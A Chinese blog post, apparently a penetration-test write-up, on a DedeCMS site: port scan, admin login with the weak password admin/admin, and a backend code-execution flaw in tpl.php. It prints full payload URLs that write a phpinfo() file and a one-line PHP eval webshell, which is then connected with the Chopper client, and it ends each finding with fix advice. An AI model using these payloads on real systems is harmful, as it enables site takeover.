dedecms

最新推荐文章于 2024-05-10 03:58:17 发布
最新推荐文章于 2024-05-10 03:58:17 发布
阅读量3.2k 收藏 1
点赞数 1
分类专栏: 安全 安全渗透 文章标签: dedecms 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/t102526/article/details/124238266
版权

1.收集信息

美国 纽约州 纽约
nmap扫描
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
御剑扫描
在这里插入图片描述

2. 漏洞

漏洞类型
(1)弱口令
漏洞描述及危害
由于网站用户帐号存在弱口令,导致攻击者通过弱口令可轻松登录到网站中,从而进行下一步的攻击,如上传webshell,获取敏感数据。另外攻击者利用弱口令登录网站管理后台,可执行任意管理员的操作。
漏洞详情
使用御剑扫资产,扫除了后台登录地址
在这里插入图片描述
使用弱口令登录admin/admin

在这里插入图片描述
修补建议
  1、强制用户首次登录时修改默认口令,或是使用用户自定义初始密码的策略;
  2、完善密码策略,信息安全最佳实践的密码策略为8位(包括)以上字符,包含数字、大小写字母、特殊字符中的至少3种。
  3、增加人机验证机制,限制ip访问次数。
(2)后台代码执行
漏洞描述及危害
任意文件写入通常由于代码中对文件写入上传功能所上传的文件过滤不严或web服务器相关解析漏洞未修复而造成的,如果文件上传功能代码没有严格限制和验证用户上传的文件后缀、类型等,攻击者可通过文件上传点上传任意文件,包括网站后门文件(webshell)控制整个网站。
漏洞详情
模板,新建模板处
在这里插入图片描述
通过浏览tpl.php代码,发现要上传的参数有:action,token,filename,content,构造payload
a.由于dedecms全局变量注册的特性,所以这里的content变量和filename变量可控。
b.可以把content内容直接写到以.lib.php结尾的文件中。
访问http://ip/admin/dede/tpl.php?action=upload,然后查看页面源码,发现token,token=a0eac73037ff0b84280aabbb1d442dbe
在这里插入图片描述
Payload: http://ip/admin/dede/tpl.php?action=savetagfile&token=a0eac73037ff0b84280aabbb1d442dbe&filename=abc.lib.php&content=<?php phpinfo();?>
在这里插入图片描述
在这里插入图片描述
http://ip/admin/dede/tpl.php?action=savetagfile&token=a0eac73037ff0b84280aabbb1d442dbe&filename=abc.lib.php&content= <?php @eval($_POST['cmd']) ?>
在这里插入图片描述
再上传一个一句话木马
使用菜刀连接

在这里插入图片描述
修补建议
 1.禁止此处写入文件。
2.过滤恶意标签

tlucky1
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dedecms5.7最新漏洞修复
a1079540945的专栏
10-15 4163
文章来源:武汉八音猫科技有限公司
Dedecms代码执行(cnvd-2018-01221)
m0_65150886的博客
02-02 280
织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统Dedecms V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。2.访问http://ip:port/dede/login.php,进入后台登录页面。1.访问http://ip:port,出现如下页面,开始实验。5.蚁剑连接,getshell。1.禁止此处写入文件。4.访问上传文件路径。
实验吧_网站综合渗透_dedecms
test
10-21 4474
前言 某天在交易平台上突然出现了你们公司大量账号以及用户信息的销售信息,老板怀疑公司的服务器被入侵了,需要你对服务器进行渗透测试找出黑客留下的5个标记,通过渗透测试的不同手段获取到隐藏在服务器中的5个key并提交到平台进行得分,答案可以是提交keyn{xxx} 操作服务器:192.168.1.2 目标服务器:192.168.1.3 题目说明 在遵守游戏规则的情况下,你需要攻击这个门户网站,通过...
HTTP身份认证401不同情况下弱口令枚举方法及java代码实现_401认证鉴权
最新发布
2401_84102653的博客
05-10 539
Java架构学习技术内容包含有:Spring,Dubbo,MyBatis, RPC, 源码分析,高并发、高性能、分布式,性能优化,微服务 高级架构开发等等。还有Java核心知识点+全套架构师学习资料和视频+一线大厂面试宝典+面试简历模板可以领取+阿里美团网易腾讯小米爱奇艺快手哔哩哔哩面试题+Spring源码合集+Java架构实战电子书+2021年最新大厂面试题。本文已被CODING开源项目:【一线大厂Java面试题解析+核心总结学习笔记+最新讲解视频+实战项目源码】收录。
个6000常用wifi弱口令._黑帽seo神器_Dedecms防黑6个常用操作、安全是良好排名第一步...
weixin_39890332的博客
11-12 114
最近有一些徒弟的网站总是被Hack入侵、被搞寄生虫、导致排名下降、网站降权、网站安全是排名的第一步、最好的防御是防患于未然!下面以Dedecms为例、给大家实战讲讲关于防止入侵的几个姿势!1、不要使用第三方网站dedecms源码、可以从dedecms官网下载程序、匹配模板根据逆冬徒弟们反馈、90%的人被入侵的网站、都是从第三方网站上直接下载了源码使用!之前逆冬也认识一些专门做源码钓鱼的兄弟、你网站...
织梦修改前台登陆密码漏洞复现
qq_55857040的博客
12-13 3411
实验前提准备 搭建Dedecms5.7 利用phpstudy在windows本地搭建dedecms网站,参考博客 Dedecms V5.7 SP2版本漏洞利用_dahege666的博客-CSDN博客_织梦漏洞利用 配置burp suite 各种浏览器配置的参考博客 Firefox+Burpsuite抓包配置(可抓取https) - slpawn - 博客园 安装Max HackBar 使用复现的浏览器搜索并安装插件 Max HackBar 复现过程 浏览器网址搜索栏,进入创建..
织梦CMS_V5.7任意用户密码重置漏洞复现
wutiangui的博客
09-12 831
漏洞位于member/resetpassword.php文件中,因未对传入的参数safeanswer进行严格类型检查,导致可使用弱类型比较绕过。在代码分析中,当 d o p o s t 等于 s a f e q u e s t i o n 时,通过传入的 dopost等于safequestion时,通过传入的 dopost等于safequestion时,通过传入的mid查询用户信息,判断安全问题和答案是否匹配。输入新密码,比如admin,然后登录试下,发现登录成功,数据库里查到的也是admin。
KiteCMS的漏洞挖掘之旅(任意文件写入、任意文件读取和反序列化)1
08-03
KiteCMS 的漏洞挖掘之旅 (任意件写、任意件读取和反序列化)任意件写这个 cms 是基于 thinkphp5.1 的基础开发的,般我们挖 cms 如果想
Dedecms_20150618_member_sqli (2).py
10-05
dedecms5.7sp1后台(要能够注册member的vip账户后台才可以)存在sql延时注入exp,用火狐得到账户登录的cookie替换,然后Python2.7跑脚本,from乌云雨神 http://www.hekaiyu.cn/hacker/3060.html
dedecms 网站地图插件
02-15
标题中的“dedecms 网站地图插件”指的是基于织梦内容管理系统DedeCms)的一个功能扩展,即用于生成网站地图的插件。网站地图是网站优化的重要工具,它能帮助搜索引擎更好地理解和索引网站内容,提高网页的收录率...
dedecms在线订单发送邮件插件_dedecms_织梦CMS_
10-01
如图所示:dedecms在线订单发送邮件插件用途:访客在线发送信息到您预先设置的邮箱,稍加修改,即可作为订单、反馈、求职等邮件发送。解压包里有安装说明,新手不会的话可以联系站长,或者留言即可。
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
dedecms一键解密工具
10-11
dedecms一键解密工具 用起来方便简单 添加地址直接一键使用 dedecms网络渗透专用
渗透测试学习14:弱口令
weixin_44315099的博客
03-12 570
弱口令即容易被破解的密码。 没特殊处理的直接burp暴力破解。 验证码有的可以绕过,也可以用一些工具(但是效果感人),但是现在大部分都没有好的解决办法,可以放弃。 Token:如果在前端的话带着,没有就猜 IP次数限制: http头:fakeip 代理 ...
带你分析CSRF攻击技术场景
kali_Ma的博客
06-10 1189
学习概要 通过本篇文档我们可以更为接近实战的去学习和了解什么是CSRF漏洞、CSRF漏洞是到底如何产生的、在实际场景中被利用是如利用,以及一些在web安全测试用常用插件与工具的使用和技巧。本篇文稿中给出了两个场景的CSRF漏洞的利用过程复现: (1)密码修改过程中产生的CSRF漏洞和利用 (2)后台管理添加过程中产生的CSRF漏洞和利用 文稿最近简单的罗列了下当前常用的避免csrf漏洞产生的方法和措施。 1、CSRF 基本概念 CSRF(Cross-site request forgery)跨站请求伪造,黑
漏洞复现-DiscuzX ≤3.4 任意文件删除漏洞
qq_59350385的博客
05-10 880
一、环境搭建 本次用的是vulhub靶场 执行下列命令部署 Discuz!X 安装环境 docker-compose up -d 安装时,只用修改数据库地址为`db`,其他保持默认即可: 二、漏洞复现 (1)访问`http://your-ip/robots.txt`可见robots.txt是存在的: (2)注册用户hahaha (3)在个人设置页面找到自己的formhash (4)带上自己的Cookie、formhash发送如下数据包 (5)查看个人设置页面的出生地
宝塔+dedecms 文件上传漏洞bypass复现
2301_80127209的博客
04-18 699
知道,1方面要对小马进行base64编码, 另外一方面要对蚁剑进行魔改。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。1,我先找的资料,是蚁剑的绕过disable_function。可以发现, 规则,对get,post ,cookie,等方式的eval,还有base64都进行了过滤。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。千万要注意的是,这个得选择这个。
网站弱口令拿后台webshell
sineblog的专栏
04-06 1161
我们刚才也发现了 DB admit敏感目录当中有一个test DB的PHP这样一个页面,并且我们可以登录,但是登录是需要密码的,那我们这时候就可以使用对应的弱口令登录我们在系统当中,弱口令可以分为字母型和数字型,字母型大多数人是使用admin作为登录的密码和用户名,而数字型大多是使用123456作为对应的密码。 下面我们来尝试一下admin进行登录,我们会发现这时候轻松的来进入到该系统的后台。我们在进入系统的后台之后,我们要查找可以写webshell,之后利用该点,来写入咱们想要的这个 web.
织梦漏洞利用
weixin_53210070的博客
12-14 1544
Dedecms网站建立 php打开网站,开始安装 漏洞利用原理 dedecms系统中使用了SQL语句防注入功能引了的安全警告。在自定义模模型中使用了union|sleep|benchmark|load_file|outfile之一都会引发这个警告,此外采集的内容,如果有‘union 这类语法也会出现在这个警告。解决办法就是把安全检查关掉,打开include下面的dedesql.class.php 和dedesqli.class.php,$this->...
dedecms 分页
05-09
DedeCMS是一款国产的开源CMS系统,它提供了强大的内容管理功能。在DedeCMS中,分页功能是非常重要的,可以让用户更加方便地浏览和阅读文章。DedeCMS的分页功能主要有两种实现方式:手动分页和自动分页。 手动分页是指用户在编辑文章时,手动在文章中插入“[!--page--]”标签,来进行分页。用户可以根据文章的内容和排版,自行决定分页的位置和数量。在前台显示文章时,系统会根据“[!--page--]”标签来将文章进行分页显示。 自动分页是指系统根据用户设置的规则,在文章超过指定字数时自动进行分页。用户可以在系统设置中指定分页的字数、分页标识等参数。在前台显示文章时,系统会根据设定的规则来将文章进行自动分页显示。 总的来说,DedeCMS的分页功能非常灵活和强大,用户可以根据自己的需求选择合适的分页方式。需要注意的是,在使用手动分页时,必须保证每个“[!--page--]”标签都是成对出现的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值